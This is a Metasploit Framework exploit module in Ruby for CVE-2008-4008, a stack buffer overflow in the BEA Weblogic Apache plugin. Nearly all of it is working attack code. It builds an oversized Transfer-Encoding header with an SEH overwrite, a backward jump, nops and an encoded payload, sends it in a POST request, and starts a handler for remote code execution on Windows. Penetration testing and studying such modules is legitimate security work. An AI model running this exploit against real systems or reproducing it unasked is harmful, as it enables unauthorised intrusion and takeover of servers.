## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache/ ] } include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'BEA Weblogic Transfer-Encoding Buffer Overflow', 'Description' => %q{ This module exploits a stack based buffer overflow in the BEA Weblogic Apache plugin. This vulnerability exists in the error reporting for unknown Transfer-Encoding headers. You may have to run this twice due to timing issues with handlers. }, 'Author' => 'pusscat', 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4008' ], [ 'OSVDB', '49283' ], [ 'URL', 'http://support.bea.com/application_content/product_portlets/securityadvisories/2806.html'], ], 'DefaultOptions' => { 'EXITFUNC' => 'seh', }, 'Privileged' => true, 'Platform' => 'win', 'Payload' => { 'Space' => 500, 'BadChars' => "\x00\x0d\x0a", 'StackAdjustment' => -1500, }, 'Targets' => [ [ 'Windows Apache 2.2 version Universal', { 'Ret' => 0x1001f4d6, #pop/pop/ret } ], ], 'DisclosureDate' => 'Sep 09 2008', 'DefaultTarget' => 0)) end def exploit sploit = rand_text_alphanumeric(5800) sploit[5781, 8] = generate_seh_record(target.ret) # Jump backward to the payload sploit[5789, 5] = "\xe9\x5e\xe9\xff\xff" sploit[0, payload.encoded.length+7] = make_nops(7) + payload.encoded datastore['VHOST'] = 'localhost' send_request_cgi( { 'method' => 'POST', 'url' => '/index.jsp', 'data' => '', 'headers' => { 'Transfer-Encoding' => sploit } }) handler end end